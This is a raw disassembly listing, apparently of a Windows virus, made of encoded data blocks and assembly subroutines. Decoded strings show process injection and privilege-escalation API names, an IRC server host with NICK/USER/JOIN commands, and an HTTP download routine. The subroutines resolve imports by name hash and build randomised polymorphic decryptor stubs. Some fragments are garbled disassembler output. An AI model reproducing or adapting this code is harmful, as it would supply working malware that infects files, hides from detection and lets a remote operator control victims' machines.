dd 564C830Fh, 73B3C79Ah, 3FCBB270h, 51882FA6h, 870A518Ah
dd 8389B417h, 401580A5h, 0A5830000h, 401584h, 88A58300h
dd 4015h, 3431858Bh, 0C9330040h, 20B1016Ah, 397E858Fh
dd 0D2330040h, 920FE8D1h, 3E2C0C2h, 397E9501h, 0EEE20040h
dd 385C657h, 1004013h, 3548B589h, 0B58D0040h, 4015BBh
dd 0BD8DC933h, 403558h, 5EE81EB1h, 5F000003h, 359495FFh
dd 0E8C10040h, 0D4840F1Fh, 8B000000h, 406A1447h, 68C303h
dd 89080010h, 40355085h, 69CE6800h, 6A0000h, 35C895FFh
dd 0C0850040h, 0FEF1840Fh, 8D97FFFFh, 401000B5h, 0B9EF8B00h
dd 0A74h, 1000ED81h, 958D0040h, 401283h, 0E2FFA5F3h, 8B20EC83h
dd 33086AFCh, 958D59C0h, 401A3Dh, 0FC8BABF3h, 0FE105789h
dd 68571C47h, 10003h, 355095FFh, 0C4830040h, 0FC08520h
dd 0FFFEA284h, 6A97FFh, 68016Ah, 68800004h, 10000h, 355095FFh
dd 0C0850040h, 0FE85840Fh, 6AFFFFh, 6850h, 6A0004h, 570CE8C1h
dd 6850016Ah, 10001h, 355095FFh, 0A680040h, 0FF000100h
dd 40355095h, 5E800h, 54E90000h, 6AFFFFFEh, 0AE35900h
dd 95FF0A6Ah, 4035BCh, 83C3F1EBh, 403570BDh, 840F0000h
dd 0FFFFFE37h, 6E8h, 44544E00h, 0FF004C4Ch, 40358895h
dd 73B58D00h, 33004017h, 0D0BD8DC9h, 0B1004035h, 46E8930Bh
dd 83000002h, 4035F8BDh, 840F0000h, 0FFFFFE03h, 35D4858Bh
dd 70FF0040h, 95858F01h, 8B004033h, 4035E885h, 170FF00h
dd 33E2858Fh, 858B0040h, 4035D8h, 8F0170FFh, 4033E985h
dd 0DC8D8B00h, 0E3004035h, 171FF09h, 33F6858Fh, 0F2E80040h
dd 8DFFFFFDh, 40364EBDh, 6ACF8B00h, 0FFD9F600h, 0E1830470h
dd 3406A03h, 6A57F9h, 0B58D186Ah, 40159Fh, 1CB9h, 8DD48B00h
dd 0FFFE4D04h, 0AB66FFFFh, 4D048Dh, 66000000h, 4478DABh
dd 0ACE432ABh, 0FBE2AB66h, 0CE68006Ah, 8B000069h, 8B006ACCh
dd 68006AC4h, 8000000h, 5251406Ah, 0FF500E6Ah, 4035E095h
dd 0C4835800h, 69CE6840h, 0D48B0000h, 0CC8B006Ah, 6A406Ah
dd 6A52026Ah, 69CE6800h, 6A0000h, 50FF6A51h, 35E495FFh
dd 595F0040h, 840FFF85h, 0FFFFFD27h, 1000B58Dh, 74B90040h
dd 8B00000Ah, 81A5F3EFh, 401000EDh, 4C858D00h, 0FF004014h
dd 0E0958DE0h, 52004018h, 359C95FFh, 16E80040h, 4C000000h
dd 756B6F6Fh, 69725070h, 656C6976h, 61566567h, 4165756Ch
dd 95FF5000h, 403548h, 354C8589h, 54500040h, 0FF6A206Ah
dd 35EC95FFh, 0C0850040h, 963F755Fh, 5656026Ah, 16AD48Bh
dd 11E852h, 65530000h, 75626544h, 69725067h, 656C6976h
dd 56006567h, 354C95FFh, 0C48B0040h, 50565656h, 95FF5756h
dd 4035D0h, 5710C483h, 353C95FFh, 6A0040h, 95FF026Ah, 403570h
dd 128B9h, 0E12B9700h, 54240C89h, 0AC95FF57h, 33004035h
dd 3CA583F6h, 4036h, 95FF5754h, 4035B0h, 5C74C085h, 4FE8346h
dd 74FFEE72h, 6A0824h, 95FF2A6Ah, 4035A8h, 0DC74C085h
dd 43DE893h, 0C9330000h, 3930E391h, 40363C85h, 81287500h
dd 0DAEC1h, 50545000h, 50505156h, 6895FF53h, 85004035h
dd 0F7459C0h, 82474FFh, 363C858Fh, 0ACE80040h, 53FFFFFDh
dd 353C95FFh, 98EB0040h, 128C481h, 0FF570000h, 40353C95h
dd 0FBE5E900h, 498DFFFFh, 58585800h, 29CE00h, 0D6500h
dd 100h, 2 dup(0)
dd 53565100h, 354895FFh, 59AB0040h, 75C084ACh, 0C3EEE2FBh
dd 7361425Ch, 6D614E65h, 624F6465h, 7463656Ah, 33575C73h
dd 69565F32h, 757472h, 7274736Ch, 6E656Ch, 61657243h, 69466574h
dd 41656Ch, 61657243h, 69466574h, 614D656Ch, 6E697070h
dd 43004167h, 74616572h, 6F725065h, 73736563h, 72430041h
dd 65746165h, 6F6D6552h, 68546574h, 64616572h, 65724300h
dd 54657461h, 61657268h, 72430064h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 4500746Fh, 54746978h
dd 61657268h, 69460064h, 6954656Ch, 6F54656Dh, 74737953h
dd 69546D65h, 4700656Dh, 69467465h, 7441656Ch, 62697274h
dd 73657475h, 65470041h, 6C694674h, 7A695365h, 65470065h
dd 6C694674h, 6D695465h, 65470065h, 646F4D74h, 48656C75h
dd 6C646E61h, 47004165h, 65547465h, 6946706Dh, 614E656Ch
dd 41656Dh, 54746547h, 50706D65h, 41687461h, 74654700h
dd 73726556h, 6E6F69h, 56746547h, 69737265h, 78456E6Fh
dd 6F4C0041h, 694C6461h, 72617262h, 4D004179h, 69567061h
dd 664F7765h, 656C6946h, 65704F00h, 6C69466Eh, 70614D65h
dd 676E6970h, 704F0041h, 72506E65h, 7365636Fh, 72500073h
dd 7365636Fh, 46323373h, 74737269h, 6F725000h, 73736563h
dd 654E3233h, 53007478h, 69467465h, 7441656Ch, 62697274h
dd 73657475h, 65530041h, 6C694674h, 6D695465h, 6C530065h
dd 706565h, 74737953h, 69546D65h, 6F54656Dh, 656C6946h
dd 656D6954h, 6D6E5500h, 69567061h, 664F7765h, 656C6946h
dd 72695600h, 6C617574h, 6F6C6C41h, 72570063h, 46657469h
dd 656C69h, 6441744Eh, 7473756Ah, 76697250h, 67656C69h
dd 6F547365h, 6E656Bh, 7243744Eh, 65746165h, 656C6946h
dd 43744E00h, 74616572h, 6F725065h, 73736563h, 43744E00h
dd 74616572h, 6F725065h, 73736563h, 4E007845h, 65724374h
dd 53657461h, 69746365h, 4E006E6Fh, 70614D74h, 77656956h
dd 6553664Fh, 6F697463h, 744E006Eh, 6E65704Fh, 656C6946h
dd 4F744E00h, 506E6570h, 65636F72h, 6F547373h, 6E656Bh
dd 7250744Eh, 6365746Fh, 72695674h, 6C617574h, 6F6D654Dh
dd 4E007972h, 69725774h, 69566574h, 61757472h, 6D654D6Ch
dd 79726Fh, 556C7452h, 6F63696Eh, 74536564h, 676E6972h
dd 6E416F54h, 74536973h, 676E6972h, 41535700h, 72617453h
dd 707574h, 736F6C63h, 636F7365h, 74656Bh, 6E6E6F63h, 746365h
dd 68746567h, 6274736Fh, 6D616E79h, 65720065h, 73007663h
dd 646E65h, 6B636F73h, 49007465h, 7265746Eh, 4374656Eh
dd 65736F6Ch, 646E6148h, 4900656Ch, 7265746Eh, 4774656Eh
dd 6F437465h, 63656E6Eh, 53646574h, 65746174h, 746E4900h
dd 656E7265h, 65704F74h, 4900416Eh, 7265746Eh, 4F74656Eh
dd 556E6570h, 416C72h, 65746E49h, 74656E72h, 64616552h
dd 656C6946h, 56444100h, 33495041h, 4C442E32h, 6552004Ch
dd 6F6C4367h, 654B6573h, 65520079h, 65704F67h, 79654B6Eh
dd 417845h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 67655200h, 56746553h, 65756C61h, 417845h, 2B05E983h
dd 6851C8h, 8DE80000h, 6A03244Ch, 51056A00h, 56A5350h
dd 8B50CC8Bh, 6A5450D4h, 53525140h, 35F095FFh, 0C4830040h
dd 0F495FF0Ch, 83004035h, 57C308C4h, 15B1858Dh, 0FF330040h
dd 6A006A50h, 0A495FF0Eh, 85004035h, 90840FC0h, 50000000h
dd 69CE68h, 6AD48B00h, 6ACC8B00h, 6840h, 26A0010h, 68006A52h
dd 69CEh, 5351006Ah, 0E495FF50h, 5F004035h, 3C95FF59h
dd 85004035h, 8B5C74FFh, 4015888Dh, 8D0CE300h, 40100095h
dd 57D10300h, 8BD2FF53h, 4035D485h, 948F8D00h, 0E8000023h
dd 0FFFFFF54h, 35E8858Bh, 8F8D0040h, 23E1h, 0FFFF43E8h
dd 0D8858BFFh, 8D004035h, 23E88Fh, 0FF32E800h, 858BFFFFh
dd 4035DCh, 0B74C085h, 23F58F8Dh, 1DE80000h, 8BFFFFFFh
dd 55C35FC7h, 0E8h, 0ED815D00h, 401A14h, 858DC933h, 401DAEh
dd 51515451h, 0FF515150h, 40356C95h, 24048700h, 353C95FFh
dd 0C25D0040h, 0E8550004h, 0
dd 43ED815Dh, 6A00401Ah, 0E958DFFh, 5000401Ah, 2420CD52h
dd 83002A00h, 0C7660CC4h, 401A5485h, 0C720CD00h, 401A5685h
dd 2A002400h, 6AC35D00h, 0FF016A01h, 473FF33h, 0C08515FFh
dd 0B68F074h, 8B000000h, 50035BD0h, 72B58D3Ch, 8B00401Ah
dd 10CBAh, 88A8B00h, 3000001h, 60CB2BF8h, 0A6F3CB8Bh, 47057461h
dd 0C2EBF5E2h, 570FC783h, 8B53D48Bh, 6A5450CCh, 6A525140h
dd 0F095FFFFh, 83004035h, 958B0CC4h, 403574h, 0EA83D72Bh
dd 6A07C707h, 8900E800h, 6AC30357h, 9E8581Ah, 8D000000h
dd 0FEAA6142h, 0C3F075C9h
; =============== S U B R O U T I N E =======================================
sub_1007FB0 proc near ; CODE XREF: sub_100881B+1B�p
; sub_1008993+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_1007FB0 endp
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401B09EDh, 4A9D8B00h, 83004036h
dd 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h, 95FF0000h
dd 403590h, 848DFC8Bh, 10424h, 6A5000h, 4E8h, 54525600h
dd 95FF5700h, 40358Ch, 978DC933h, 104h, 26A5151h, 68016A51h
dd 40000000h, 5C95FF52h, 96004035h, 5B74F685h, 4685450h
dd 57000001h, 2024B4FFh, 0FF000002h, 40362895h, 0C0855900h
dd 14E31674h, 6AD48B50h, 57515200h, 0CC95FF56h, 59004035h
dd 0D075C085h, 3C95FF56h, 8D004035h, 57524457h, 8D58446Ah
dd 10497h, 0C033AB00h, 0F359106Ah, 505050ABh, 50505050h
dd 6495FF52h, 81004035h, 208C4h, 2474FF00h, 1895FF08h
dd 53004036h, 361895FFh, 0C25D0040h, 3E800004h, 4601750Ah
dd 15848D8Bh, 19E30040h, 1000958Dh, 0D1030040h, 84D2FF56h
dd 1F880FC0h, 0F000001h, 11084h, 3A3E8000h, 80461075h
dd 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h, 0CF8B4275h
dd 4F0146C6h, 6A51CE2Bh, 53565100h, 361095FFh, 3B590040h
dd 0DF850FC1h, 8D000000h, 401DA285h, 68006A00h, 0Ch, 95FF5350h
dd 403610h, 0C3Dh, 0BF850F00h, 0E9000000h, 0B1h, 52503E81h
dd 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch, 99h, 0F375203Ch
dd 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h, 74656721h, 3CAC7F75h
dd 817C7520h, 6820FF7Eh, 71757474h, 70037E81h, 752F2F3Ah
dd 0FF47C668h, 0BA310F00h, 2710h, 0FF52E2F7h, 4035BC95h
dd 50C03300h, 0E8505050h, 9, 6E776F44h, 64616F6Ch, 2095FF00h
dd 85004036h, 333674C0h, 4A8589C9h, 51004036h, 20068h
dd 56515180h, 2495FF50h, 8D004036h, 401B0395h, 0C9335000h
dd 52505154h, 95FF5151h, 40356Ch, 0FF240487h, 40353C95h
dd 80C3F800h, 4015778Dh, 0C3F90100h, 54464F53h, 45524157h
dd 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h, 435C7377h
dd 65727275h, 6556746Eh, 6F697372h, 78455C6Eh, 726F6C70h
dd 54007265h, 65677261h, 736F4874h, 20074h, 0F0FFh, 72700000h
dd 6D69786Fh, 6372692Eh, 616C6167h, 702E7978h, 494E006Ch
dd 67204B43h, 6F627171h, 0A75776Bh, 52455355h, 32307720h
dd 31303530h, 2E202E20h, 4A2D3A20h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 401DB4h, 157785C6h, 0FF000040h
dd 40359495h, 1FE8C100h, 1E6A3C74h, 3550B58Bh, 0AC590040h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 403640BDh, 2768B00h
dd 0A566A557h, 336A858Dh, 858F0040h, 403390h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 858D43EBh, 4015B1h, 6A006A50h
dd 0A495FF0Eh, 83004035h, 408247Ch, 4E82B75h, 53000000h
dd 0FF004346h, 40358895h, 0FC48E800h, 7E8FFFFh, 53000000h
dd 4F5F4346h, 95FF0053h, 403588h, 0FFFC31E8h, 0F356E8FFh
dd 8DFFFFFFh, 401303h, 0BE8h, 45535500h, 2E323352h, 4C4C44h
dd 359C95FFh, 0AE80040h, 77000000h, 69727073h, 4166746Eh
dd 95FF5000h, 403548h, 35548589h, 310F0040h, 18E08D8Dh
dd 85890040h, 403646h, 9C95FF51h, 93004035h, 468h, 0EDB58D00h
dd 59004018h, 362CBD8Dh, 0D6E80040h, 66FFFFF6h, 1D6785C7h
dd 0F0FF0040h, 1D69A583h, 8D000040h, 401D2795h, 6A545000h
dd 52006A01h, 268h, 3095FF80h, 85004036h, 22755AC0h, 1D5A8D8Dh
dd 6A520040h, 67B58D06h, 5400401Dh, 51505056h, 3495FF52h
dd 58004036h, 362C95FFh, 85C60040h, 40384Dh, 0CE800h, 53570000h
dd 334B434Fh, 4C442E32h, 95FF004Ch, 40359Ch, 76893h, 0B58D0000h
dd 401844h, 0FCBD8D59h, 0E8004035h, 0FFFFF651h, 0CE8h
dd 4E495700h, 54454E49h, 4C4C442Eh, 9C95FF00h, 85004035h
dd 0E7840FC0h, 93000001h, 568h, 82B58D00h, 59004018h, 3618BD8Dh
dd 1AE80040h, 83FFFFF6h, 40361CBDh, 840F0000h, 1C2h, 190EC81h
dd 68540000h, 101h, 35FC95FFh, 0C4810040h, 190h, 6AD48B50h
dd 95FF5200h, 40361Ch, 7559C085h, 1388680Dh, 95FF0000h
dd 4035BCh, 0BD83E2EBh, 401D69h, 8D297500h, 401D6D85h
dd 95FF5000h, 403608h, 840FC085h, 13Bh, 8B0C408Bh, 8F30FF00h
dd 401D6985h, 4D85C600h, 1004038h, 16A006Ah, 95FF026Ah
dd 403614h, 0FFFF883h, 11284h, 958D9300h, 401D65h, 5352106Ah
dd 360495FFh, 0C0850040h, 0F2850Fh, 0BD8D0000h, 401D86h
dd 0BCE808B1h, 68FFFFFAh, 94h, 89E62B5Eh, 0FF542434h, 40359895h
dd 94BD8D00h, 0B100401Dh, 0FA9DE801h, 448BFFFFh, 0E0C11024h
dd 24440B08h, 8E0C104h, 824440Bh, 5E850h, 2E250000h, 57007836h
dd 355495FFh, 0C4830040h, 647C60Ch, 81958D20h, 6A00401Dh
dd 216800h, 53520000h, 361095FFh, 7C8D0040h, 0FF571424h
dd 40355895h, 3804C600h, 6A400Ah, 0FF535750h, 40361095h
dd 8DE60300h, 401DA2BDh, 68006A00h, 0Ch, 95FF5357h, 403610h
dd 0C3Dh, 8D4D7500h, 40364EB5h, 4D8D8D00h, 2B004038h, 51006ACEh
dd 95FF5356h, 40360Ch, 7E00F883h, 0FE8B912Fh, 364EB58Dh
dd 0DB00040h, 1075AEF2h, 0FAF8E860h, 7261FFFFh, 8D09E317h
dd 0EAEB0177h, 0CE2BCF8Bh, 364EBD8Dh, 0A4F30040h, 0B9EBF787h
dd 95FF53h, 80004036h, 401577BDh, 2A740100h, 753068h, 0BC95FF00h
dd 80004035h, 40384DBDh, 11740000h, 1D6985C7h, 40h, 85C60000h
dd 40384Dh, 0FE56E900h, 85C7FFFFh, 401580h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 0D216574h, 0D479ED0Ah
dd 56A8BA4Fh, 0B1FAE51Ah, 0C7840427h, 0A6142930h, 6EF96A10h
dd 99AD4760h, 37524862h, 73C17E40h, 0AB59571Ah, 6CCC5C3Ah
dd 0A61413C2h, 0B8B35210h, 0D8h, 11h dup(0)
dd 0E7851B00h
db 0DEh
; =============== S U B R O U T I N E =======================================
sub_1008765 proc near ; CODE XREF: sub_10087AC:loc_1008809�p
; sub_100886C+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_1008781: ; CODE XREF: sub_1008765+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_10087A3
cmp eax, [edx+8]
jnb short loc_10087A3
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_10087A8
; ---------------------------------------------------------------------------
loc_10087A3: ; CODE XREF: sub_1008765+23�j
; sub_1008765+28�j
add edx, 28h
loop loc_1008781
loc_10087A8: ; CODE XREF: sub_1008765+3C�j
popa
retn 4
sub_1008765 endp
; =============== S U B R O U T I N E =======================================
sub_10087AC proc near ; CODE XREF: .rsrc:01008AD8�p
; .rsrc:01008AFE�p
mov [ebp+4022F7h], al
call sub_100881B
push 1Fh
lea eax, [ebp+402224h]
pop ecx
loc_10087C3: ; CODE XREF: sub_10087AC+1E�j
cmp [eax], ebx
jz short loc_10087D3
add eax, 4
loop loc_10087C3
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_10087D3: ; CODE XREF: sub_10087AC+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_10087ED
loc_10087DD: ; CODE XREF: sub_10087AC+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_10087DD
mov [ebp+402224h], ebx
loc_10087ED: ; CODE XREF: sub_10087AC+2F�j
; sub_100881B+34�j
cmp dword ptr [edx], 0
jz short loc_10087F7
sub esi, [edx]
add esi, [edx+10h]
loc_10087F7: ; CODE XREF: sub_10087AC+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_1008806
push dword ptr [edx]
jmp short loc_1008809
; ---------------------------------------------------------------------------
loc_1008806: ; CODE XREF: sub_10087AC+54�j
push dword ptr [edx+10h]
loc_1008809: ; CODE XREF: sub_10087AC+58�j
call sub_1008765
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_10087AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_100881B proc near ; CODE XREF: sub_10087AC+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_100886C
mov eax, [ebp+40398Eh]
call sub_1007FB0
call sub_1008858
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_1008851
mov [ebp+4022A0h], ebx
jmp short loc_10087ED
; ---------------------------------------------------------------------------
loc_1008851: ; CODE XREF: sub_100881B+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_100881B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_1008858 proc near ; CODE XREF: sub_100881B+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_100886C
xor ecx, ecx
retn
sub_1008858 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_100886C proc near ; CODE XREF: sub_100881B+10�p
; sub_1008858+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_1008765
add edx, [ebp+4039AAh]
add edx, esi
loc_1008880: ; CODE XREF: sub_100886C+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_1008991
cmp dword ptr [edx+10h], 0
jz locret_1008991
mov eax, [edx+0Ch]
push eax
call sub_1008765
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_10088A6: ; CODE XREF: sub_100886C+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_10088C6
cmp cl, 2Eh
jz short loc_10088B5
loc_10088B2: ; CODE XREF: sub_100886C+58�j
inc eax
jmp short loc_10088A6
; ---------------------------------------------------------------------------
loc_10088B5: ; CODE XREF: sub_100886C+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_10088B2
loc_10088C6: ; CODE XREF: sub_100886C+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_1008989
cmp word ptr [eax-2], 3233h
jnz loc_1008989
push esi
cmp dword ptr [edx], 0
jnz short loc_10088E9
mov ecx, [edx+10h]
jmp short loc_10088EB
; ---------------------------------------------------------------------------
loc_10088E9: ; CODE XREF: sub_100886C+76�j
mov ecx, [edx]
loc_10088EB: ; CODE XREF: sub_100886C+7B�j
add esi, ecx
push ecx
call sub_1008765
add esi, [ebp+4039AAh]
loc_10088F9: ; CODE XREF: sub_100886C+90�j
; sub_100886C+117�j
lodsd
test eax, eax
js short loc_10088F9
jz loc_1008988
push dword ptr [ebp+4039AAh]
push eax
call sub_1008765
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_1008925: ; CODE XREF: sub_100886C+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_100893C
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_1008925
; ---------------------------------------------------------------------------
loc_100893C: ; CODE XREF: sub_100886C+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_1008982
cmp ebx, 0DB6E45A8h
jz short loc_1008982
cmp ebx, 0FFA13B59h
jz short loc_1008982
cmp ebx, 0ACB522D6h
jz short loc_1008982
cmp ebx, 0F358E993h
jz short loc_1008982
cmp ebx, 0F358E97Dh
jz short loc_1008982
cmp ebx, 0E1253F46h
jz short loc_1008982
cmp ebx, 0E1253F30h
jz short loc_1008982
call dword ptr [ebp+403992h]
loc_1008982: ; CODE XREF: sub_100886C+D6�j
; sub_100886C+DE�j ...
pop ebx
jmp loc_10088F9
; ---------------------------------------------------------------------------
loc_1008988: ; CODE XREF: sub_100886C+92�j
pop esi
loc_1008989: ; CODE XREF: sub_100886C+60�j
; sub_100886C+6C�j
add edx, 14h
jmp loc_1008880
; ---------------------------------------------------------------------------
locret_1008991: ; CODE XREF: sub_100886C+18�j
; sub_100886C+22�j
retn
sub_100886C endp
; ---------------------------------------------------------------------------
db 1
; =============== S U B R O U T I N E =======================================
sub_1008993 proc near ; CODE XREF: .rsrc:01008AD1�p
; .rsrc:01008AF7�p
push 4
pop eax
call sub_1007FB0
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_1007FB0
add edx, 8
xchg edx, ecx
loc_10089BB: ; CODE XREF: sub_1008993:loc_10089FA�j
push 5
pop eax
call sub_1007FB0
cmp dl, 3
jnb short loc_10089D3
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_10089FA
; ---------------------------------------------------------------------------
loc_10089D3: ; CODE XREF: sub_1008993+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_10089F4
mov al, 11h
call sub_1007FB0
mov eax, 1
loc_10089E8: ; CODE XREF: sub_1008993+5D�j
test dl, dl
jz short loc_10089F9
shl eax, 1
dec dl
jmp short loc_10089E8
; ---------------------------------------------------------------------------
jmp short loc_10089F9
; ---------------------------------------------------------------------------
loc_10089F4: ; CODE XREF: sub_1008993+47�j
mov eax, 80000000h
loc_10089F9: ; CODE XREF: sub_1008993+57�j
; sub_1008993+5F�j
stosd
loc_10089FA: ; CODE XREF: sub_1008993+3E�j
loop loc_10089BB
retn
sub_1008993 endp
; ---------------------------------------------------------------------------
loc_10089FD: ; CODE XREF: sub_1009457+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_1008A12
mov al, 60h
stosb
loc_1008A12: ; CODE XREF: .rsrc:01008A0D�j
test dword ptr [ebp+403431h], 1000003h
jz loc_1008B18
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0BE8A35D6h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_1008A90
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_1008A5B
mov eax, 2E8B6467h
loc_1008A5B: ; CODE XREF: .rsrc:01008A54�j
stosd
mov ax, 0
stosw
jz short loc_1008A67
mov al, 5Dh
stosb
loc_1008A67: ; CODE XREF: .rsrc:01008A62�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_1008A8E
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_1008A8E
mov eax, 0F8ED83h
loc_1008A8E: ; CODE XREF: .rsrc:01008A76�j
; .rsrc:01008A87�j
stosd
dec edi
loc_1008A90: ; CODE XREF: .rsrc:01008A43�j
test dword ptr [ebp+403431h], 3
jz short loc_1008AA0
mov al, 0E9h
stosb
stosd
loc_1008AA0: ; CODE XREF: .rsrc:01008A9A�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_1008B18
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_1008993
mov al, 20h
call sub_10087AC
jecxz short loc_1008B18
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_1008B0B
call sub_1008993
mov al, 1Fh
call sub_10087AC
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_1008B0B: ; CODE XREF: .rsrc:01008AF5�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_1008B18: ; CODE XREF: .rsrc:01008A1C�j
; .rsrc:01008AB7�j ...
test dword ptr [ebp+403431h], 4
jz short loc_1008B36
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_1008B36: ; CODE XREF: .rsrc:01008B22�j
test dword ptr [ebp+403431h], 8
jnz short loc_1008B8C
cmp byte ptr [ebp+40342Fh], 0
jz short loc_1008B8C
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_1008B8A
mov al, 49h
stosb
mov ax, 0FC75h
loc_1008B8A: ; CODE XREF: .rsrc:01008B81�j
stosw
loc_1008B8C: ; CODE XREF: .rsrc:01008B40�j
; .rsrc:01008B49�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_1008BAD
mov al, 58h
or al, [ebp+403429h]
stosb
loc_1008BAD: ; CODE XREF: .rsrc:01008BA2�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_1008BC0
add ah, 28h
loc_1008BC0: ; CODE XREF: .rsrc:01008BBB�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_1008BE4
mov al, 50h
add al, [ebp+403429h]
stosb
loc_1008BE4: ; CODE XREF: .rsrc:01008BD9�j
test dword ptr [ebp+403431h], 80h
jnz short loc_1008BFB
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_1008C38
; ---------------------------------------------------------------------------
loc_1008BFB: ; CODE XREF: .rsrc:01008BEE�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_1008C0D
mov al, 29h
loc_1008C0D: ; CODE XREF: .rsrc:01008C09�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_1008C30
mov ah, 0C8h
loc_1008C30: ; CODE XREF: .rsrc:01008C2C�j
or ah, [ebp+40342Ah]
stosw
loc_1008C38: ; CODE XREF: .rsrc:01008BF9�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_1008CBC
test dword ptr [ebp+403431h], 400h
jnz short loc_1008C67
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_1008CB4
; ---------------------------------------------------------------------------
loc_1008C67: ; CODE XREF: .rsrc:01008C5A�j
